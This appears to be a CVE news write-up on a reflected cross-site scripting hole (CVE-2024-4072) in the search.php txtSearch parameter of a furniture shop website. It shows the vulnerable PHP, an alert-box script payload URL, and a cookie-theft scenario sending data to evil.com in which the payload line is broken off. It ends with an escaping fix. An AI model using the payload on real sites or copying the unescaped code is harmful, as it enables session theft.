CVE CyberSecurity Database News

CVE-2024-4072 - Cross-Site Scripting (XSS) Exploit in Kashipara Online Furniture Shopping Ecommerce Website 1.

Poster -

A new vulnerability has been uncovered in the Kashipara Online Furniture Shopping Ecommerce Website 1., tracked as CVE-2024-4072 (VDB-261798). This issue opens up the door for Cross-Site Scripting (XSS) attacks against anyone who visits the affected site. In this post, we’ll break down what went wrong, show the code that’s at fault, explain the potential risks, and demonstrate how attackers might exploit the system.

What is Cross-Site Scripting (XSS)?

To put it simply, Cross-Site Scripting, or XSS, is a security flaw that lets attackers inject harmful scripts into webpages other people are viewing. If the site doesn’t check or clean-up user input, anyone could sneak JavaScript onto the page. When another visitor loads the page, that script runs as if it came from the website itself. This can result in account hijacking, information theft, or worse.

Public Exploit Available: Yes

- CVE: CVE-2024-4072
- VULDB Entry: VDB-261798

How the Vulnerability Works

The problem is found in the search.php file. A parameter called txtSearch is used for searching furniture items. But the website does not sanitize the input before displaying it back to users. This means any code typed into the search bar is echoed out without cleaning, making it easy to inject JavaScript.

Here’s a simplified example of what the vulnerable code might look like in search.php

<?php
// Get the search term from GET parameter
$search = $_GET['txtSearch'];

// Vulnerable: outputs user input directly into HTML
echo "<h2>Search Results for: $search</h2>";

// ... logic to search and display items ...
?>

This code takes anything from the txtSearch parameter and dumps it straight into HTML. No checks, no escaping, no filtering. If an attacker injects some script, it will appear—and run—on the page.

Suppose someone opens the following URL in their browser

http://victim-site.com/search.php?txtSearch=<script>alert('XSS')</script>;

Because the website doesn’t sanitize the input, this is what gets sent back to the user in the page:

<h2>Search Results for: <script>alert('XSS')</script></h2>

When loaded, this pops up an alert box—proving the attack works! But it could also do much worse, like stealing session cookies or injecting background malware.

`shell

http://victim-site.com/search.php?txtSearch=

Send or Embed:

Share this link via email, social media, or inject it into a vulnerable forum/blog.

Unsuspecting Victim Clicks:

The victim loads the URL. The script runs in their browser context, sending their cookies to evil.com.

Attacker Gains Control:

With stolen session cookies, the attacker impersonates the user, takes over their account, or performs unauthorized actions.

The Patch—How To Fix It

To stop XSS, always sanitize and escape user-supplied input. Here’s a safer way to echo user input in PHP:

<?php
$search = htmlspecialchars($_GET['txtSearch'], ENT_QUOTES, 'UTF-8');
echo "<h2>Search Results for: $search</h2>";
?>

This way, any tags (like <script>) are neutralized and displayed as text.

References

- VULDB Entry VDB-261798
- CVE-2024-4072 at cve.org
- Kashipara Project Source and Demo

Summary

The CVE-2024-4072 vulnerability in Kashipara Online Furniture Website is a classic example of how dangerous it is to trust user input. By not sanitizing the txtSearch field in search.php, attackers can run any JavaScript they want in other peoples’ browsers. A tiny code tweak can prevent this—never output raw user input without escaping it.

If you run this site (or any similar one), make sure to update your code as shown above. If you’re a user, be wary of strange links, and always update your browser to limit potential harm from XSS flaws.

Timeline

Published on: 04/23/2024 23:15:49 UTC
Last modified on: 07/16/2024 14:57:24 UTC